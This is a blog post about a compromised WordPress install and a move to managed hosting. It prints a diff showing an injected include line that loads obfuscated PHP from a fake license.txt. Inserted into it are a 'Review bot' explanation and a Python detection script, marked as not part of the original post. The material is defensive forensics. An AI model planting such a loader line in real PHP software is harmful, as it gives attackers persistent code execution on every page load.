As you can see, this blog finally has a new look, based on the excellent WordPress Bootstrap theme from 320press (modelled after Twitter Bootstrap). Behind the scenes there is another major change: I moved from self-hosted WordPress at Dreamhost to the managed WordPress service from Page.ly (note: this is a referral link), a widely known high-performance, security-focused WordPress host. If the blog feels much faster than before, that is hopefully one of the effects.
The major reason behind this recent move is rather scary. My previous WordPress installation was breached and the content was modified for some dubious SEO campaign. It might be just a coincidence, but apparently at around the same time 18 million hosted blogs at WordPress.com were also compromised. It could be a case of cross-contamination, something which is known to trigger blackhat SEO malware. Since I am not a security expert and I know almost nothing about WordPress, it was hard for me to find out what went wrong (I did take the usual basic steps to harden WordPress when I installed it). Perhaps my shell account was simply cracked.
During the backup and the move to the new setup, the only forensic step I took was to check the WordPress installation itself. Compared to a fresh 3.3.1, the file carrying the WordPress DB class shows this malicious injection:
@@ -1,4 +1,5 @@
-< ?php
+<?php
+@include_once $_SERVER['DOCUMENT_ROOT'].'/wp-includes/license.txt';
/**
* WordPress DB Class
*
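Review bot: the second `+` line of the hunk, `@include_once $_SERVER['DOCUMENT_ROOT'].'/wp-includes/license.txt';`, is the indicator to search for: it pulls a `.txt` file from `wp-includes` in as PHP, which no legitimate line of this file does, and the leading `@` suppresses any warning if the include fails, so a broken or removed payload leaves nothing in the error log. Because the injection sits at the very top of the file, before the `WordPress DB Class` doc block, it executes on every request that loads the database class, which is effectively every page load; when cleaning an install, grepping all `.php` files for `include` or `require` of a non-`.php` target, and diffing every file against the pristine release, is the check that would have caught this.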
The referenced license.txt is timestamped March 29, 2012 (if that can be trusted at all). As expected, the content of the file is not the actual license of WordPress but obfuscated PHP code that carries out a suspicious bootstrapping sequence as the initial stage of the attack. After formatting it, you can see the full content at gist.github.com/2338282. I know very little PHP and I don't have the motivation to decipher the entire attack machinery, but I hope this can be useful for some security experts and/or malware analysts out there.
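The two checks described above, diffing the install against a pristine release and looking for an include that loads a non-PHP file, as an added example that is not part of the original post. The sample trees (a `wp-includes/wp-db.php` and `license.txt`, clean and injected) are constructed inline; in practice `diff_against_reference` would be pointed at the unpacked official tarball and the live document root.

```python
import hashlib
import os
import re
import tempfile

# include/require statements; group 2 is the target expression (e.g. the license.txt path).
INCLUDE_RE = re.compile(
    r"@?\b(include|include_once|require|require_once)\b\s*\(?\s*(.+?)\s*\)?\s*;", re.IGNORECASE)

def sha256_tree(root):
    """Map each file under root (relative, '/'-separated) to its SHA-256 digest."""
    digests = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "rb") as fh:
                digests[rel] = hashlib.sha256(fh.read()).hexdigest()
    return digests

def diff_against_reference(reference, installed):
    """Return (modified, added) paths of the installed tree compared to a clean reference."""
    ref, cur = sha256_tree(reference), sha256_tree(installed)
    modified = sorted(p for p in cur if p in ref and cur[p] != ref[p])
    added = sorted(p for p in cur if p not in ref)
    return modified, added

def suspicious_includes(php_source):
    """Return include/require targets that do not end in .php (e.g. a .txt loaded as code)."""
    targets = (m.group(2) for m in INCLUDE_RE.finditer(php_source))
    return [t for t in targets if not t.rstrip("'\"").lower().endswith(".php")]

def demo():
    """Constructed sample: a clean reference tree and an install carrying the injected include."""
    clean_db = "<?php\n/**\n * WordPress DB Class\n */\n"
    infected_db = ("<?php\n@include_once $_SERVER['DOCUMENT_ROOT']"
                   ".'/wp-includes/license.txt';\n/**\n * WordPress DB Class\n */\n")
    files = {"reference": {"wp-db.php": clean_db, "license.txt": "GPL text (placeholder)\n"},
             "installed": {"wp-db.php": infected_db, "license.txt": "<?php /* obfuscated */\n"}}
    with tempfile.TemporaryDirectory() as ref, tempfile.TemporaryDirectory() as cur:
        for root, tree in ((ref, files["reference"]), (cur, files["installed"])):
            os.makedirs(os.path.join(root, "wp-includes"))
            for name, body in tree.items():
                with open(os.path.join(root, "wp-includes", name), "w") as fh:
                    fh.write(body)
        modified, added = diff_against_reference(ref, cur)
    return modified, added, suspicious_includes(infected_db)
```

The hash diff reports both touched files, while the include scan pinpoints the line that turns license.txt into executable code; a file that only appears in `added` (a dropped web shell, say) shows up in the first check alone.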
Over the last half year, my blog has averaged 12K visits/month, with bandwidth consumption reaching up to 15 GB/month. If there is another incident like this in the near future, perhaps I should just give up dynamic content management and write or generate plain documents instead. In the meantime, keep reading!